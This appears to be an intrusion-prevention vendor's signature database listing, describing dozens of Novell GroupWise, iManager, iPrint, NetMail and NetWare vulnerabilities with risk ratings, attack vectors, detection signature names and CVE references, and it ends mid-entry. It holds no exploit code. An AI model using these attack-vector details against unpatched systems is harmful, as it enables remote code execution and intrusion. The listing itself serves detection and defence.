http://www.securityfocus.com/bid/55574

Novell-Groupwise-Internet-Agent-IMAP-Service-CREATE-Command-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Novell GroupWise Internet Agent IMAP Service

Risk:

Critical

First detected in:

sgpkg-ips-325-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell GroupWise

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell GroupWise Internet Agent IMAP Service. A remote authenticated attacker can exploit this vulnerability by sending a crafted CREATE command with an excessively long mailbox name to execute arbitrary System-level code.

Situation:

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Create-Command

References:

BID-41704
http://www.securityfocus.com/bid/41704

Novell-Groupwise-Internet-Agent-RCPT-Command-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell Groupwise

Risk:

High

First detected in:

sgpkg-ips-288-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in the Novell GroupWise. The vulnerability is due to a boundary error while processing specially crafted SMTP request. Remote attackers can exploit this vulnerability to execute arbitrary code on the target server. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute with the security privileges of the server. In an attack case where code injection is not successful, the affected process will terminate abnormally.

Situation:

SMTP_Novell-Groupwise-Internet-Agent-RCPT-Command-Buffer-Overflow

References:

CVE-2009-0410
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0410

BID-33560
http://www.securityfocus.com/bid/33560

Novell-Groupwise-Internet-Agent-RRULE-Parsing-BOF

About this vulnerability:

A buffer overflow vulnerability in the Novell GroupWise Internet Agent

Risk:

Critical

First detected in:

sgpkg-ips-365-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell GroupWise

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Novell GroupWise Internet Agent. A remote unauthenticated attacker can exploit this vulnerability by sending a malicious e-mail to the vulnerable target system to cause a denial of service condition or execute arbitrary code with SYSTEM privileges.

Situation:

SMTP_CS-Novell-Groupwise-Internet-Agent-RRULE-Parsing-BOF

References:

BID-44732
http://www.securityfocus.com/bid/44732

Novell-Groupwise-Internet-Agent-RRULE-Weekday-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell Groupwise

Risk:

Moderate

First detected in:

sgpkg-ips-416-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Buffer Overflow

Description:

There is a remote code execution vulnerability in Novell GroupWise Internet Agent (GWIA). The vulnerability is due to a buffer overflow when parsing a VCALENDAR Weekday RRULE variable in an email. An unauthenticated remote attacker could exploit this vulnerability by sending a malicious email to the target. In a successful attack, the behavior of the target machine depends on the intention of the injected code, which runs in the security context of the SYSTEM. In an unsuccessful attack, the vulnerable application may terminate abnormally.

Situation:

File-TextId_Novell-Groupwise-Internet-Agent-RRULE-Weekday-Parsing

References:

CVE-2011-2662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2662

OSVDB-75770
http://www.osvdb.org/75770

Novell-Groupwise-Internet-Agent-SMTP-Auth-Login-Command-Buffer-Overflow

About this vulnerability:

Novell GroupWise Internet Agent SMTP AUTH LOGIN Command Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-223-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in Novell GroupWise. The vulnerability is due to an error while processing specially crafted SMTP AUTH LOGIN requests. Remote attackers can exploit this vulnerability to execute arbitrary code on the target server. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute with the security privileges of the server.

Situation:

SMTP_CS-Novell-Groupwise-Auth-Login-BOF

References:

CVE-2009-1636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1636

BID-35065
http://www.securityfocus.com/bid/35065

OSVDB-54645
http://www.osvdb.org/54645

OSVDB-54644
http://www.osvdb.org/54644

Novell-Groupwise-Messenger-Client-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Novell GroupWise Messenger Client

Risk:

High

First detected in:

sgpkg-ips-1060-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise Messenger

Type:

Input Validation

Description:

There exists a buffer overflow vulnerability in Novell GroupWise Messenger Client.

Situation:

File-TextId_Novell-Groupwise-Messenger-Client-Buffer-Overflow

References:

CVE-2008-2703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2703

BID-29602
http://www.securityfocus.com/bid/29602

Novell-Groupwise-Messenger-HTTP-Response-Handling-Stack-Overflow

About this vulnerability:

A vulnerability in Novell GroupWise Messenger Client (GWIM) for Windows

Risk:

High

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell GroupWise Messenger

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Novell GroupWise Messenger product. The flaw is due to improper handling of crafted HTTP responses. An unauthenticated remote attacker can exploit this vulnerability by sending spoofed HTTP responses to the target host. Successful attack could allow for arbitrary code execution with privileges of the currently logged in user.

Situation:

Generic_SS-Novell-Groupwise-Messenger-HTTP-Response-Handling-Stack-Overflow

References:

CVE-2008-2703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2703

BID-29602
http://www.securityfocus.com/bid/29602

Novell-Groupwise-Messenger-Nmma.exe-Createsearch-Memory-Corruption

About this vulnerability:	A vulnerability in Novell GroupWise Messenger
Risk:	High
First detected in:	sgpkg-ips-443-4219
Last changed:	sgpkg-ips-1588-5242
Platform:	Generic
Software:	Novell GroupWise Messenger
Type:	Malfunction
Description:	There is a heap memory corruption vulnerability in Novell GroupWise Messenger. Specifically, the vulnerability is caused by improper handling of crafted parameters when processing a request to /createsearch. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target service on port 8300/TCP. Successful exploitation could allow remote code execution in the context of the target service, which is SYSTEM.
Situation:	HTTP_CRL-Novell-Groupwise-Messenger-Nmma.exe-Createsearch-Memory-Corruption

Novell-Groupwise-Messenger-Nmma.exe-Login-Memory-Corruption

About this vulnerability:

A vulnerability in Novell GroupWise Messenger

Risk:

High

First detected in:

sgpkg-ips-443-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise Messenger

Type:

Malfunction

Description:

There is a heap memory corruption vulnerability in Novell GroupWise Messenger. Specifically, the vulnerability is caused by improper parsing of crafted tags when processing a login message. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted login request to the target service (by default) on port 8300/TCP. Successful exploitation could possibly allow remote code execution under the context of the target service.

Situation:

Generic_CS-Novell-Groupwise-Messenger-Nmma.exe-Login-Memory-Corruption

References:

BID-52056
http://www.securityfocus.com/bid/52056

Novell-Groupwise-Messenger-Server-Process-Memory-Information-Disclosure

About this vulnerability:

A vulnerability in Novell GroupWise Messenger

Risk:

High

First detected in:

sgpkg-ips-443-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise Messenger

Type:

Malfunction

Description:

There is an information disclosure vulnerability in Novell Messenger Server. An error in the Messenger Server process, which occurs while processing certain commands, can result in the disclosure of the contents of arbitrary memory locations. Remote attackers may exploit this vulnerability by sending a specially crafted command to target server. Exploitation of this vulnerability would cause information disclosure or abnormal termination of the affected program.

Situation:

Generic_CS-Novell-Groupwise-Messenger-Memory-Information-Disclosure

References:

CVE-2011-3179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3179

BID-50443
http://www.securityfocus.com/bid/50443

OSVDB-76729
http://www.osvdb.org/76729

Novell-Groupwise-WebAccess-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Novell Groupwise WebAccess

Risk:

High

First detected in:

sgpkg-ips-666-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell Groupwise WebAccess

Type:

Input Validation

Description:

A cross-site scripting vulnerability exists in Novell GroupWise WebAccess. The vulnerability is due to lack of input validation when handling email attachments. A remote, unauthenticated attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt will result in the execution of script code in the current browser session of a target user.

Situation:

File-Text_Novell-Groupwise-WebAccess-Cross-Site-Scripting
File-Text_Novell-Groupwise-WebAccess-Cross-Site-Scripting-2

References:

CVE-2014-0611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0611

Novell-iManager-Class-Name-Remote-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Novell iManager

Risk:

High

First detected in:

sgpkg-ips-321-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Novell iManager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell iManager. The vulnerability is due to a boundary error when handling HTTP requests sent to the "/nps/servlet/webacc/" module. A remote authenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code execution with the privileges of the vulnerable application.

Situation:

HTTP_CRL-Novell-iManager-Class-Name-Remote-Buffer-Overflow

References:

CVE-2010-1929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1929

BID-40480
http://www.securityfocus.com/bid/40480

OSVDB-65737
http://www.osvdb.org/65737

Novell-iManager-Create-Attribute-EnteredAttrName-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell iManager

Risk:

High

First detected in:

sgpkg-ips-449-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell iManager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in Novell iManager. The vulnerability is due to insufficient validation of the EnteredAttrName parameter when handling HTTP requests in the Create Attribute function. This may be exploited by remote, authenticated attackers to execute arbitrary code on the target server by sending a crafted HTTP POST request. In situations where code execution is successful the behaviour of the vulnerable server would depend on the intentions of the injected code, which will run in the security context of the SYSTEM user. When code execution is not successful the vulnerable service may terminate abnormally, leading to a denial-of-service condition.

Situation:

HTTP_CRL-Novell-iManager-Create-Attribute-EnteredAttrName-Buffer-Overflow

References:

CVE-2011-4188
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4188

BID-40480
http://www.securityfocus.com/bid/40480

OSVDB-81026
http://www.osvdb.org/81026

Novell-iManager-eDirectory-Plugin-Schema-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Novell iManager

Risk:

High

First detected in:

sgpkg-ips-278-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell iManager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Novell iManager eDirectory plugin. The vulnerability is due to improper validation of user input. A remote, authenticated attacker can exploit this vulnerability by sending specially crafted parameters to the application. Successful exploitation of this vulnerability results in arbitrary code execution with the privileges of the SYSTEM user.

Situation:

HTTP_CRL-Novell-iManager-eDirectory-Plugin-Schema-Buffer-Overflow

References:

CVE-2009-4486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4486

BID-37672
http://www.securityfocus.com/bid/37672

OSVDB-61584
http://www.osvdb.org/61584

Novell-iManager-Getmultipartparameters-Unauthorized-File-Upload

About this vulnerability:	A vulnerability in Novell iManager
Risk:	High
First detected in:	sgpkg-ips-372-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Novell iManager
Type:	Input Validation
Description:	An unauthorized file upload vulnerability exists in Novell iManager. The vulnerability is due to insufficient validation of user input within the getMultiPartParameters() function. A remote attacker can leverage this vulnerability to upload arbitrary content to arbitrary files on the target system. Successful exploitation can lead to arbitrary code execution on a target system within the security context of the affected service. On Windows the service runs with the privileges of System.
Situation:	HTTP_CS-Novell-iManager-Servlet-Modulemanager-Upload-Vulnerability

Novell-iPrint-Client-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A Novell iPrint Client ActiveX Control Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-676-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell iPrint Client

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Novell iPrint Client 5.40 which allows remote attackers to execute arbitrary code by sending an overly long string to the debug parameter in ExecuteRequest() property of ienipp.ocx.

Situation:

File-Text_Novell-iPrint-Client-ActiveX-Control-Buffer-Overflow

References:

CVE-2010-3106
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3106

OSVDB-66960
http://www.osvdb.org/66960

Novell-iPrint-Client-ActiveX-Control-GetPrinterURLLList-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Novell iPrint Client

Risk:

High

First detected in:

sgpkg-ips-165-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell iPrint Client for Windows

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell iPrint Client. The vulnerability is caused by insufficient boundary checking when certain parameters are passed to the affected ActiveX control. An attacker may exploit this vulnerability by enticing a target user to open a malicious web page. Successful exploitation can lead to injection and execution of arbitrary code in the security context of the currently logged in user.

Situation:

HTTP_SS-Novell-iPrint-Client-ActiveX-Control-GetPrinterURLList-Buffer-Overflow
File-Text_Novell-iPrint-Client-ActiveX-Control-GetPrinterURLList-Buffer-Overflow

References:

CVE-2008-2436
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2436

BID-30986
http://www.securityfocus.com/bid/30986

Novell-iPrint-Client-ActiveX-Control-Multiple-Buffer-Overflows

About this vulnerability:

Multiple vulnerabilities in Novell iPrint Client ActiveX control

Risk:

High

First detected in:

sgpkg-ips-189-2032

Last changed:

sgpkg-ips-1729-5242

Platform:

Windows

Software:

Novell iPrint Client for Windows

Type:

Buffer Overflow

Description:

There are multiple buffer overflow vulnerabilities in the ActiveX control included within Novell iPrint Client. The vulnerabilities are caused by a insufficient boundary checking when certain parameters are passed to various methods exposed by the affected ActiveX control. An attacker may exploit this vulnerability by enticing a target user to open a malicious web page. Successful exploitation might lead to injection and execution of arbitrary code in the security context of the currently logged in user.

Situation:

HTTP_SS-Novell-iPrint-Client-ActiveX-Control-GetDriverFile-BOF
HTTP_SS-Novell-iPrint-Client-ActiveX-Control-UploadPrinterDriver-BOF
HTTP_SS-Novell-iPrint-Client-ActiveX-Control-UploadResource-BOF
File-Text_Novell-iPrint-Client-ActiveX-Control-GetDriverFile-BOF
File-Text_Novell-iPrint-Client-ActiveX-Control-UploadResource-BOF
File-Text_Novell-iPrint-Client-ActiveX-Control-ExecuteRequest-Target-Frame-BOF

References:

CVE-2008-2431
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2431

BID-30813
http://www.securityfocus.com/bid/30813

Novell-iPrint-Client-ActiveX-GetPrinterURLList2-Invalid-Free

About this vulnerability:

A vulnerability in Novell iPrint Client for Windows

Risk:

High

First detected in:

sgpkg-ips-446-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell iPrint Client for Windows

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Novell's iPrint Client ActiveX control. The vulnerability is due to the use of uninitialized pointers in a call to a free function. A remote, unauthenticated attacker could exploit this vulnerability to execute arbitrary code in the security context of the user. If code execution is unsuccessful, the application may terminate unexpectedly.

Situation:

File-Text_Novell-iPrint-Client-ActiveX-GetPrinterURLList2-Invalid-Free

References:

CVE-2011-4185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4185

OSVDB-78953
http://www.osvdb.org/78953

Novell-iPrint-Client-Browser-Plugin-call-back-url-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Novell iPrint Client

Risk:

Moderate

First detected in:

sgpkg-ips-366-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell iPrint Client for Windows

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell iPrint Client. A remote attacker can exploit this vulnerability by enticing affected users to visit a malicious web page to execute arbitrary code in the context of the current user.

Situation:

HTTP_SS-Novell-iPrint-Client-Browser-Plugin-call-back-url-Buffer-Overflow
File-Text_Novell-iPrint-Client-Browser-Plugin-call-back-url-Buffer-Overflow

References:

CVE-2010-1527
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1527

BID-42576
http://www.securityfocus.com/bid/42576

OSVDB-67411
http://www.osvdb.org/67411

Novell-iPrint-Client-ExecuteRequest-debug-Parameter-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Novell iPrint Client

Risk:

Moderate

First detected in:

sgpkg-ips-366-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell iPrint Client for Windows

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell iPrint Client. A remote attacker can exploit this vulnerability by enticing an affected user to access a malicious web page to execute arbitrary code in the context of the current user.

Situation:

HTTP_SS-Novell-iPrint-Client-ExecuteRequest-debug-Parameter-Buffer-Overflow
File-Text_Novell-iPrint-Client-ExecuteRequest-debug-Parameter-Buffer-Overflow

References:

CVE-2010-4316
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4316

Novell-iPrint-Client-For-Windows-IPP-Response-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell iPrint Client for Windows

Risk:

High

First detected in:

sgpkg-ips-529-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell iPrint Client for Windows

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Novell iPrint Client. The vulnerability is due to insufficient validation of IPP responses that can lead to a stack buffer overflow. Successful exploitation can allow an attacker to execute arbitrary code on a target system in the security context of the user. In an unsuccessful attack attempt, the browser may abnormally terminate.

Situation:

HTTP_SCH-Novell-iPrint-Client-For-Windows-IPP-Response-Stack-Buffer-Overflow

References:

CVE-2013-1091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1091

BID-59612
http://www.securityfocus.com/bid/59612

OSVDB-92938
http://www.osvdb.org/92938

Novell-iPrint-Client-GetDriverSettings-Realm-Parameter-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell iPrint Client

Risk:

High

First detected in:

sgpkg-ips-467-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell iPrint Client

Type:

Buffer Overflow

Description:

There are two stack buffer overflow vulnerabilities in Novell iPrint Client. The vulnerabilities are due to insufficient validation of the Realm parameter to the method GetDriverSettings. A remote attacker can leverage this vulnerability by enticing a target user to open a specially crafted web page. Successful exploitation can allow an attacker to execute arbitrary code on a target system in the security context of the current user. In an unsuccessful attack attempt, the browser may abnormally terminate.

Situation:

File-Text_Novell-iPrint-Client-GetDriverSettings-Realm-Parameter-Stack-BOF-2
File-Text_Novell-iPrint-Client-GetDriverSettings-Realm-Parameter-Stack-BOF

References:

CVE-2011-4187
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4187

OSVDB-78955
http://www.osvdb.org/78955

Novell-iPrint-Client-GetDriverSettings-Stack-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Novell iPrint Client

Risk:

High

First detected in:

sgpkg-ips-359-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell iPrint Client for Windows

Type:

Buffer Overflow

Description:

Situation:

HTTP_SS-Novell-iPrint-Client-GetDriverSettings-Stack-Buffer-Overflow
File-Text_Novell-iPrint-Client-GetDriverSettings-Stack-Buffer-Overflow

References:

CVE-2011-3173
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3173

BID-44966
http://www.securityfocus.com/bid/44966

BID-50367
http://www.securityfocus.com/bid/50367

OSVDB-76631
http://www.osvdb.org/76631

Novell-iPrint-Client-Remote-File-Deletion

About this vulnerability:

A vulnerability in Novell iPrint Client

Risk:

Moderate

First detected in:

sgpkg-ips-367-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell iPrint Client for Windows

Type:

Malfunction

Description:

There is a vulnerability in Novell iPrint Client. The vulnerability is due to a design error in nipplib.dll which is called by the ActiveX control, ienipp.ocx. A remote attacker can exploit this vulnerability by enticing affected users to visit a malicious web page to delete arbitrary files.

Situation:

HTTP_SS-Novell-iPrint-Client-Remote-File-Deletion
File-Text_Novell-iPrint-Client-Remote-File-Deletion

References:

CVE-2010-3107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3107

OSVDB-66961
http://www.osvdb.org/66961

Novell-iPrint-Client-Stack-Buffer-Overflow-CVE-2010-4321

About this vulnerability:

A vulnerability in Novell iPrint Client

Risk:

Moderate

First detected in:

sgpkg-ips-544-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell iPrint Client

Type:

Buffer Overflow

Description:

There is a stack buffer overflow in Novell iPrint Client. The vulnerability is due to insufficient validation by the ienipp.ocx ActiveX when processing input to one of the vulnerable methods (GetDriverSettings, and GetDriverSettings2.) A remote attacker can leverage this vulnerability by enticing a target user to open a specially crafted web page. Successful exploitation can allow an attacker to execute arbitrary code on a target system. In an unsuccessful attack attempt, the browser may abnormally terminate.

Situation:

File-Text_Novell-iPrint-Client-Stack-Buffer-Overflow-CVE-2010-4321

References:

CVE-2010-4321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4321

BID-44966
http://www.securityfocus.com/bid/44966

OSVDB-69357
http://www.osvdb.org/69357

Novell-iPrint-Client-Target-Frame-Stack-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Novell iPrint Client

Risk:

High

First detected in:

sgpkg-ips-278-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell iPrint Client for Windows

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell iPrint Client for Windows. The vulnerability is due to a boundary error in the ActiveX control when parsing the target-frame parameter value. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious web page, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Novell-iPrint-Client-Target-Frame-Stack-Buffer-Overflow
File-Text_Novell-iPrint-Client-Target-Frame-Stack-Buffer-Overflow

References:

CVE-2009-1568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1568

BID-37242
http://www.securityfocus.com/bid/37242

Novell-iPrint-Client-Volatile-Date-Time-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell iPrint Client ActiveX Control

Risk:

High

First detected in:

sgpkg-ips-278-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell iPrint Client for Windows

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell iPrint Client. The vulnerability is due to a boundary error when parsing malicious persistence parameter values. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious web page, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Novell-iPrint-Client-Volatile-Date-Time-Parsing-Buffer-Overflow
File-Text_Novell-iPrint-Client-Volatile-Date-Time-Parsing-Buffer-Overflow

References:

CVE-2009-1569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1569

BID-37242
http://www.securityfocus.com/bid/37242

Novell-iPrint-Server-Attributes-Natural-Language-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell iPrint Server

Risk:

Moderate

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell iPrint Server; Novell Open Enterprise Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell iPrint Server. The vulnerability is due to insufficient validation when handling the attributes-natural-language attribute. A remote attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable software. Successful exploitation can result in arbitrary code execution in the context of the affected service.

Situation:

HTTP_CS-Novell-iPrint-Server-Attributes-Natural-Language-Buffer-Overflow

References:

CVE-2011-4194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4194

BID-51791
http://www.securityfocus.com/bid/51791

OSVDB-78778
http://www.osvdb.org/78778

Novell-Messenger-Client-Filename-Parameter-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell GroupWise Messenger

Risk:

Moderate

First detected in:

sgpkg-ips-520-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise Messenger

Type:

Buffer Overflow

Description:

There is a stack buffer overflow in the Novell Messenger client. The vulnerability is due to insufficient validation of the filename parameter with an import command. This could result in a stack buffer overflow. A remote attacker can exploit this vulnerability by enticing a user to follow a malicious URL with the nim: protocol. Successful exploitation could result in arbitrary code being executed with the privileges of the currently logged in user.

Situation:

File-Text_Novell-Messenger-Client-Filename-Parameter-Stack-Buffer-Overflow

References:

CVE-2013-1085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1085

OSVDB-91477
http://www.osvdb.org/91477

Novell-NetIQ-Privileged-User-Manager-Eval-Policy-Bypass

About this vulnerability:

A vulnerability in Novell Privileged User Manager

Risk:

High

First detected in:

sgpkg-ips-494-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell Privileged User Manager

Type:

Malfunction

Description:

A policy-bypass vulnerability has been reported in Novell NetIQ Privileged User Manager, which could allow remote attackers to compromise a system. The vulnerability is due to an access control weakness when handling calls to the eval method within POST requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a malicious eval request to the vulnerable server. Successful exploitation could result in command execution under the context of the SYSTEM.

Situation:

Generic_CS-Novell-NetIQ-Privileged-User-Manager-Eval-Policy-Bypass
HTTP_CS-Novell-NetIQ-Privileged-User-Manager-Eval-Policy-Bypass

References:

OSVDB-87334
http://www.osvdb.org/87334

Novell-NetIQ-Privileged-User-Manager-Modifyaccounts-Policy-Bypass

About this vulnerability:

A vulnerability in Novell Privileged User Manager

Risk:

Moderate

First detected in:

sgpkg-ips-494-5211

Last changed:

sgpkg-ips-1583-5242

Platform:

Generic

Software:

Novell Privileged User Manager

Type:

Malfunction

Description:

There is a policy bypass vulnerability in Novell NetIQ Privileged User Manager. The vulnerability is due to an access control weakness when handling a modifyAccounts request. A remote, unauthenticated attacker can exploit this vulnerability by sending a malicious request to a vulnerable server. Successful exploitation could result in code execution under the context of SYSTEM.

Situation:

HTTP_CS-Novell-NetIQ-Privileged-User-Manager-Modifyaccounts-Policy-Bypass

References:

OSVDB-87335
http://www.osvdb.org/87335

Novell-NetMail-IMAP-Buffer-Overflow

About this vulnerability:

A Novell NetMail IMAP Buffer Overflow vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-748-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000

Software:

Novell NetMail

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Novell NetMail, versions before 3.52e FTF2, which allows remote attackers to execute arbitrary code via a long argument to the SUBSCRIBE command.

Situation:

IMAP_CS-Novell-NetMail-IMAP-Buffer-Overflow

References:

CVE-2006-6761
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6761

BID-21728
http://www.securityfocus.com/bid/21728

OSVDB-31360
http://www.osvdb.org/31360

Novell-NetMail-WebAdmin-Username-Stack-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Novell NetMail

Risk:

High

First detected in:

sgpkg-ips-100-1314

Last changed:

sgpkg-ips-1734-5242

Platform:

Generic

Software:

Novell NetMail

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in the Novell NetMail WebAdmin service. The vulnerability due to a boundary error when performing HTTP basic authentication. A remote user can exploit this vulnerability by sending specially crafted HTTP Basic authentication username data to the 'webadmin.exe' process on TCP port 89. This allows the attacker to execute arbitrary code on the target system with the privileges of the WebAdmin process, normally System.

Situation:

HTTP_CS-Novell-NetMail-WebAdmin-Username-Stack-Buffer-Overflow

References:

CVE-2007-1350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1350

BID-22857
http://www.securityfocus.com/bid/22857

Novell-NetWare-AFP-Remote-Denial-Of-Service

About this vulnerability:	A vulnerability in Novell Netware
Risk:	Low
First detected in:	sgpkg-ips-410-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Novell NetWare
Software:	<os>
Type:	Malfunction
Description:	A denial of service vulnerability exists in Novell Netware. The vulnerability is due to a memory handling error in the AFPTCP.nlm module when processing malformed AFP packets. This vulnerability may be exploited by remote unauthenticated attackers to cause a denial of service condition on the target server by sending malicious packets to TCP port 548. In a successful attack, all existing connections to the affected service are broken and clients must reconnect to the service. An attacker could consistently attack a target system, making it difficult, or impossible, to use the affected service.
Situation:	Generic_CS-Novell-NetWare-AFP-Remote-Denial-Of-Service

Novell-NetWare-CIFS.NLM-Buffer-Overflow

About this vulnerability:

A Novell NetWare CIFS.NLM Buffer Overflow vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Novell NetWare

Software:

Novell NetWare CIFS

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Novell NetWare, versions 6.5 SP2 and SP3, 5.1, and 6.0, which allows remote attackers to cause a denial of service condition via an incorrect password length.

Situation:

SMB-TCP_Novell-NetWare-CIFS.NLM-Buffer-Overflow

References:

CVE-2005-2852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2852

OSVDB-12790
http://www.osvdb.org/12790

Novell-NetWare-FTP-Server-Dele-Command-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell Netware

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Novell NetWare

Software:

<os>

Type:

Buffer Overflow

Description:

